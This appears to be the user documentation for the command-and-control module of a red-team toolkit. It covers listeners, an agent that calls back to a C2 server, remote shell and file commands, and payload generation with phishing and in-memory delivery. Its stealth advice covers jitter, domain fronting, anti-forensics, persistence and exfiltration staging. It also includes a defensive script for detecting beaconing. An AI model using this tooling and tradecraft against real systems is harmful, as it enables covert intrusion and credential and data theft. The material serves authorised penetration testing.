Command and Control (C2)

Quick Start

1. Start a Listener

  1. Navigate to Toolkit → C2
  2. Go to the Listeners tab
  3. Configure listener settings:
    • Host: IP address to bind (default: 0.0.0.0)
    • Port: TCP port (default: 8443)
    • Sleep: Agent beacon interval in seconds (default: 5)
    • Jitter: Random delay percentage (default: 10%)
  4. Click Start Listener

The listener begins accepting agent connections.

2. Deploy an Agent

Build the Agent

# Build for current platform
cargo build -p sk-agent --release

# Cross-compile for Windows
cargo build -p sk-agent --release --target x86_64-pc-windows-gnu

# Cross-compile for Linux
cargo build -p sk-agent --release --target x86_64-unknown-linux-gnu

Binary location: target/release/sk-agent for a native build, or target/<target>/release/sk-agent for a cross-compiled build (sk-agent.exe for Windows targets)

Run the Agent

# Connect to default listener (localhost:8443)
./sk-agent

# Connect to specific C2 server
./sk-agent --server http://192.168.1.100:8443

# With custom sleep interval (30 seconds)
./sk-agent --server http://192.168.1.100:8443 --sleep 30

# With jitter (20% random delay)
./sk-agent --server http://192.168.1.100:8443 --jitter 20

3. Interact with Agent

  1. In the Agents tab, you'll see the connected agent
  2. Click on the agent to open the command interface
  3. Issue commands (see Supported Commands)
  4. View command output in real-time

Listener Management

Listener Configuration

Host (Bind Address):

  • 0.0.0.0 - Bind to all interfaces (recommended)
  • 127.0.0.1 - Local testing only
  • Specific IP - Bind to particular interface

Port:

  • Default: 8443 (HTTPS)
  • Requires firewall rules for external access
  • Consider using common ports (80, 443) for blending

Sleep Interval:

  • Time in seconds between agent check-ins
  • Lower = more responsive, higher network traffic
  • Higher = stealth, lower network traffic
  • Typical range: 5-60 seconds

Jitter:

  • Random delay percentage (0-100%)
  • Prevents predictable beacon patterns
  • 10-20% is typical for stealth
  • 0% for debugging (consistent timing)
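
On the monitoring side of an engagement, the sleep and jitter settings show up as the spacing between check-ins from one client to one destination. The following is an added example, not StrikeKit code: it scores that spacing over constructed timestamps. The event tuple layout, the thresholds, the function names and the assumption that jitter is applied symmetrically around the sleep value are all illustrative.

```python
import random
import statistics
from collections import defaultdict

MIN_GAPS = 10   # assumed minimum sample size before scoring a pair
MAX_CV = 0.35   # assumed threshold: coefficient of variation of the gaps

def interarrival_stats(timestamps):
    """Return (median_gap, cv) for one client/destination pair, or None."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < MIN_GAPS:
        return None
    mean = statistics.fmean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean > 0 else 0.0
    return statistics.median(gaps), cv

def flag_beacons(events, max_cv=MAX_CV):
    """events: (epoch_seconds, src_ip, dest) tuples from proxy or flow logs.
    Returns {(src_ip, dest): (median_gap, cv)} for low-variance pairs."""
    by_pair = defaultdict(list)
    for ts, src, dest in events:
        by_pair[(src, dest)].append(ts)
    flagged = {}
    for pair, stamps in by_pair.items():
        stats = interarrival_stats(stamps)
        if stats is not None and stats[1] <= max_cv:
            flagged[pair] = stats
    return flagged

def constructed_events(seed=7):
    """Constructed sample data, not captured traffic."""
    rng = random.Random(seed)
    events, t = [], 0.0
    for _ in range(60):   # check-ins at sleep=5s with 10% jitter (assumed +/-)
        t += 5 * (1 + rng.uniform(-0.10, 0.10))
        events.append((t, "10.0.0.23", "192.168.1.100:8443"))
    t = 0.0
    for _ in range(60):   # interactive browsing: bursty, exponential gaps
        t += rng.expovariate(1 / 20)
        events.append((t, "10.0.0.42", "intranet.example:443"))
    return events

if __name__ == "__main__":
    for (src, dest), (median, cv) in flag_beacons(constructed_events()).items():
        print(f"{src} -> {dest}: median gap {median:.1f}s, cv {cv:.3f}")
```

Legitimate periodic clients such as update checks and telemetry also produce low-variance gaps, so a real deployment needs an allow-list and a longer observation window than this sample.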

Starting and Stopping

Start: Click Start Listener button

  • Listener binds to configured port
  • Accepts agent connections
  • Shows "Running" status

Stop: Click Stop Listener button

  • Stops accepting new connections
  • Existing agent sessions remain active
  • Shows "Stopped" status

Listener Status

Listener displays:

  • Current bind address and port
  • Number of active agents
  • Total data transferred
  • Uptime

Agent Management

Agent Tab

The Agents tab shows all connected agents:

Agent Information:

  • ID: Unique agent identifier
  • Hostname: Target system hostname
  • IP Address: Agent's IP
  • OS: Operating system and version
  • User: Current user context
  • Status: Active, Idle, Disconnected
  • Last Seen: Time of last check-in

Agent Status

  • Active: Recently checked in, ready for tasking
  • Idle: No activity, waiting for commands
  • Disconnected: Missed multiple check-ins (considered dead)

Agent Actions

Select Agent: Click to open command interface

Task Agent: Send commands via command input

Kill Agent: Gracefully terminate agent (sends exit command)

Remove: Remove from agent list (disconnected agents only)

Supported Commands

System Commands

sysinfo

Get system information:

CPU: Intel Core i7
RAM: 16GB
OS: Windows 10 Pro
Hostname: DESKTOP-ABC123
User: john.doe

pwd

Print current working directory:

C:\Users\john.doe\Documents

cd <path>

Change working directory:

cd C:\Windows\System32

ls [path]

List directory contents:

ls
ls C:\Users

ps

List running processes:

PID    Name                CPU%    Memory
1234   chrome.exe          15.2    512MB
5678   explorer.exe        2.1     128MB

Command Execution

shell <command>

Execute shell command:

shell whoami
shell ipconfig
shell net user

Output is returned and displayed in the interface.

Auto-extraction: StrikeKit automatically extracts:

  • IP addresses → Targets
  • Credentials (in common formats) → Credentials
  • Hostnames → Targets

File Operations

upload <local_path>

Upload file to agent:

upload /path/to/local/file.txt

File is transferred and saved to agent's current directory.

download <remote_path>

Download file from agent:

download C:\Users\john\important.docx

File is transferred and saved to Analysis → Evidence.

Reconnaissance

screenshot

Capture screenshot:

screenshot

Screenshot is transferred and saved to Analysis → Evidence.

Agent Control

sleep <seconds>

Change beacon interval:

sleep 30

Agent updates its check-in frequency.

exit

Gracefully terminate agent:

exit

Agent performs cleanup and exits.

Payload Generation

Payloads Tab

Generate custom payloads with embedded C2 configuration:

  1. Go to Payloads tab
  2. Configure payload options:
    • Target OS: Windows, Linux, macOS
    • C2 Server: IP and port
    • Sleep: Default beacon interval
    • Jitter: Default jitter percentage
    • Format: Executable, PowerShell, Bash script
  3. Click Generate

Payload includes:

  • Compiled agent binary
  • Embedded C2 configuration
  • Optional obfuscation

Delivery Methods

Direct execution:

  • Copy to target system
  • Execute directly

Web delivery:

  • Host on web server
  • Target downloads and executes

Script-based (PowerShell/Bash):

  • Execute via command line
  • In-memory execution (no disk artifacts)

Social engineering:

  • Embed in documents (macros)
  • Phishing email attachment

Auto-Extraction

StrikeKit automatically extracts useful information from C2 command output:

Targets

Automatically extracted from:

  • ipconfig / ifconfig output
  • nslookup / dig output
  • net view output
  • arp -a output

New targets are added to Intelligence → Targets.

Credentials

Automatically extracted from:

  • net user output
  • cat /etc/shadow output
  • Mimikatz output
  • LaZagne output
  • Configuration files

New credentials are added to Analysis → Credentials.

Evidence

Automatically saved:

  • Command output (if significant)
  • Downloaded files
  • Screenshots
  • Process lists

Saved to Analysis → Evidence with agent ID and timestamp.

Integrations (Coming Soon)

Future support for external C2 frameworks:

Sliver

  • Import Sliver sessions into StrikeKit
  • Unified agent management
  • Evidence auto-extraction

Mythic

  • Mythic agent management
  • Payload generation
  • Task tracking

Covenant

  • Import .NET agents
  • Task output extraction
  • Integrated reporting

Security Considerations

Operational Security

  1. Use HTTPS: Enable TLS for listener (configure certificates)
  2. Change default port: Avoid common C2 ports
  3. Jitter: Always use jitter to avoid pattern detection
  4. Sleep intervals: Balance responsiveness with stealth
  5. Egress filtering: Test allowed outbound ports before deployment

Agent Security

  1. Credential protection: Agents don't store credentials on disk
  2. Process injection: Use in-memory techniques when possible
  3. Anti-forensics: Minimal disk artifacts
  4. Cleanup: Use exit command for graceful termination

Network Security

  1. Domain fronting: Use CDN fronting (future feature)
  2. User-Agent spoofing: Blend with legitimate traffic
  3. Protocol mimicry: HTTPS looks like normal web traffic
  4. IP rotation: Consider multiple listeners on different IPs

Troubleshooting

Agent Won't Connect

  1. Check listener status: Verify listener is running
  2. Verify network connectivity: Test port with telnet or nc
  3. Check firewall: Ensure port is open
  4. Verify server address: Agent must use correct IP/hostname
  5. Check logs: Review agent and listener logs for errors

Agent Disconnected

  1. Check last seen time: Agent may have crashed
  2. Verify network: Network connectivity lost?
  3. Check sleep interval: Very high sleep = infrequent check-ins
  4. Review agent logs: Was agent terminated?

Command Not Executing

  1. Check agent status: Is agent active?
  2. Verify command syntax: Review supported commands
  3. Check permissions: Does agent user have required privileges?
  4. Review output: Look for error messages

Best Practices

Agent Management

  1. Name agents: Use descriptive names (hostname-username-date)
  2. Document targets: Link agents to targets in Intelligence → Targets
  3. Track activities: Create activities for significant C2 operations
  4. Evidence collection: Save important command output

Operational Workflow

  1. Test locally first: Verify agent and listener work before deployment
  2. Start with high sleep: Use 30-60 seconds initially, reduce as needed
  3. Monitor agent health: Check last seen times regularly
  4. Graceful shutdown: Use exit command instead of killing processes

Reporting

  1. Document commands: Save significant command output as evidence
  2. Link to findings: Reference C2 evidence in finding documentation
  3. Timeline updates: Add C2 milestones to timeline
  4. Kill chain tracking: Tag C2 activities appropriately

Tips

  1. Multiple listeners: Run listeners on different ports for redundancy
  2. Agent persistence: Use upload to deploy persistence mechanisms
  3. Lateral movement: Use C2 for internal pivoting
  4. Data staging: Stage sensitive data before exfiltration
  5. Cleanup tracking: Keep notes on what needs cleanup before engagement end

  • Targets - Auto-populated from C2 reconnaissance
  • Credentials - Auto-extracted from C2 output
  • Evidence - C2 artifacts and screenshots
  • Kill Chain - Track C2 activities in attack progression

Next Steps

After setting up C2:

  1. Deploy Agents - Get agents on target systems
  2. Collect Credentials - Store discovered credentials
  3. Gather Evidence - Save command output and screenshots
  4. Track in Kill Chain - Monitor attack progression
  5. Document Findings - Record vulnerabilities discovered via C2
